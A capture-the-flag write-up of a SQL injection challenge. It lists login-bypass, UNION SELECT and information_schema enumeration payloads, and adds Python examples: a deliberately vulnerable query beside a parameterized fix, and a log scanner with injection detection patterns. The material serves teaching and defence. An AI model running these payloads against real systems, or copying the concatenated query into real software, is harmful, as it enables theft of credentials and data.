
2019 lovesql Challenge Analysis

Tech, May 12

Upon inspection of the URL, it shows: check.php?username=admin&password=password.

To proceed, a SQL injection test is performed using the classic "universal password" tautology bypass:

Username: 1' or 1=1#
Password: 123 (any input)

This reveals the actual username is admin and the password hash is 8cd4984005351346e19adc4dcebabfc0.
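The bypass works because check.php splices the raw username into the SQL text, so the quote in the payload closes the string literal and the comment discards the password clause. As an added example that is not the challenge's own PHP (which the writeup does not show), the following constructed Python/SQLite model puts that query shape next to a parameterized one. Assumptions: SQLite has no "#" comment, so the same tautology is written with SQLite's "-- " comment; the "tester" account and its password "123" are constructed, and the admin row reuses the hash recovered above.

```python
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the challenge's login table (in-memory, not the real schema).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE geekuser (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO geekuser (id, username, password) VALUES (?, ?, ?)",
        [
            (1, "admin", "8cd4984005351346e19adc4dcebabfc0"),   # hash from the writeup
            (2, "tester", hashlib.md5(b"123").hexdigest()),     # constructed account
        ],
    )
    return conn


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    # Same shape as the challenge's check.php: the username is concatenated into the SQL
    # text, so a quote ends the literal and a trailing comment removes the password check.
    sql = (
        "SELECT id, username FROM geekuser "
        f"WHERE username = '{username}' AND password = '{md5_hex(password)}'"
    )
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        # A malformed probe (e.g. an ORDER BY past the column count) surfaces as a
        # database error; here it is reported as "no rows" rather than a stack trace.
        return []


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    # Placeholders send the values separately from the SQL text; quote and comment
    # characters are just bytes inside the compared string and cannot change the query.
    sql = "SELECT id, username FROM geekuser WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, md5_hex(password))).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "1' or 1=1-- "   # SQLite spelling of the writeup's  1' or 1=1#
    print("vulnerable   :", login_vulnerable(db, tautology, "123"))
    print("parameterized:", login_parameterized(db, tautology, "123"))
    print("real login   :", login_parameterized(db, "tester", "123"))
```

Run as-is: the concatenated version returns every row for the tautology, the parameterized version returns nothing for it and still authenticates the constructed tester account normally. Hashing the password before the query does not help, because the injection lands in the username field.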

Next, determine the number of columns in the query using the ORDER BY clause:

check.php?username=admin' order by 3%23&password=1 (valid)
check.php?username=admin' order by 4%23&password=1 (error)

This confirms that there are three columns.

Using a UNION SELECT query to identify which columns are reflected in the output:

check.php?username=1' union select 1,2,3%23&password=1

Columns 2 and 3 are reflected in the page output, so they can carry extracted data.

Retrieve database name and version:

check.php?username=1' union select 1,database(),version()%23&password=1

With the database identified, find all tables:

check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

Two tables are found: geekuser and l0ve1ysq1.

Check columns within each table:

check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'%23&password=1
check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=1

Both tables contain fields: id, username, and password.

Extract data from both tables:

check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1

No flag is found in this table. Proceed to the other:

check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

The flag is discovered: flag{763cf102-e6b0-4085-88cc-4eeb7cbc8a83}.

Summary of exploitation steps:

  1. Determine column count: 1' order by 1 #
  2. Verify output reflection: 1' union select 1,2,3 #
  3. Fetch database info: 1' union select 1,database(),version() #
  4. List tables: 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
  5. Retrieve column names: 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #
  6. Extract data to find flag: 1' union select 1,2,group_concat(id,username,password) from AAA%23&password=1

A variant that inserts a hex-encoded ASCII separator (0x40 is the "@" character) between username and password, so the concatenated output is easier to read:

1' union select 1,2,group_concat(username,0x40,password) from AAA%23&password=1
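Every step in the summary above travels in the query string of a GET request, so it is also visible in the web server's access log. As an added example (not part of the original writeup), the following Python scanner parses constructed Apache-style log lines that carry the writeup's payloads percent-encoded, decodes the parameters, and reports which of the enumeration patterns each request matches. The log lines, the IP addresses and the rule names are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines: line 1 and 6 are benign, lines 2-5 carry the writeup's
# payloads percent-encoded (%27 = ', %20 = space, %23 = #).
LOG_LINES = [
    '203.0.113.5 - - [12/May/2019:10:00:01 +0000] "GET /check.php?username=admin&password=password HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/May/2019:10:00:07 +0000] "GET /check.php?username=1%27%20or%201=1%23&password=123 HTTP/1.1" 200 611 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/May/2019:10:00:15 +0000] "GET /check.php?username=admin%27%20order%20by%203%23&password=1 HTTP/1.1" 200 611 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/May/2019:10:00:16 +0000] "GET /check.php?username=admin%27%20order%20by%204%23&password=1 HTTP/1.1" 500 233 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/May/2019:10:00:30 +0000] "GET /check.php?username=1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23&password=1 HTTP/1.1" 200 742 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/May/2019:10:01:02 +0000] "GET /check.php?username=orderly&password=s3cret HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# Apache "combined" format: client, ident, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# Each rule maps to one step of the enumeration described in the writeup. The last rule
# requires a quote before the comment so that a lone "#" in a password is not flagged.
RULES = [
    ("union-select", re.compile(r"\bunion\b\s+(all\s+)?select\b")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+")),
    ("schema-enum", re.compile(r"\binformation_schema\.")),
    ("tautology", re.compile(r"\bor\s+1\s*=\s*1\b")),
    ("quote-and-comment", re.compile(r"'.*?(#|--\s|/\*)")),
]


def normalize(value: str) -> str:
    # Decode until stable so a double-encoded payload (%2527) is still seen, then fold
    # case and whitespace so the regexes need only one spelling.
    prev = None
    while prev != value:
        prev, value = value, unquote_plus(value)
    return re.sub(r"\s+", " ", value).lower()


def inspect_params(params: list) -> dict:
    # Returns {parameter name: [matched rule names]} for parameters that hit any rule.
    hits = {}
    for name, raw in params:
        value = normalize(raw)
        matched = [rule for rule, pattern in RULES if pattern.search(value)]
        if matched:
            hits[name] = matched
    return hits


def parse_line(line: str):
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "path": parts.path,
        "params": parse_qsl(parts.query, keep_blank_values=True),
    }


def scan(lines: list) -> list:
    # One finding per request whose parameters match at least one rule.
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        hits = inspect_params(rec["params"])
        if hits:
            findings.append({"line": n, "ip": rec["ip"], "status": rec["status"],
                             "path": rec["path"], "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan(LOG_LINES):
        print(f"line {f['line']}: {f['ip']} {f['path']} status={f['status']} hits={f['hits']}")
```

Lines 3 and 4 together show the ORDER BY probe pattern from the writeup: the same client, consecutive column numbers, and the second request answered with a 500. Correlating order-by-probe hits per client with a status change is a stronger signal than any single request, and is a natural next step over this output.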
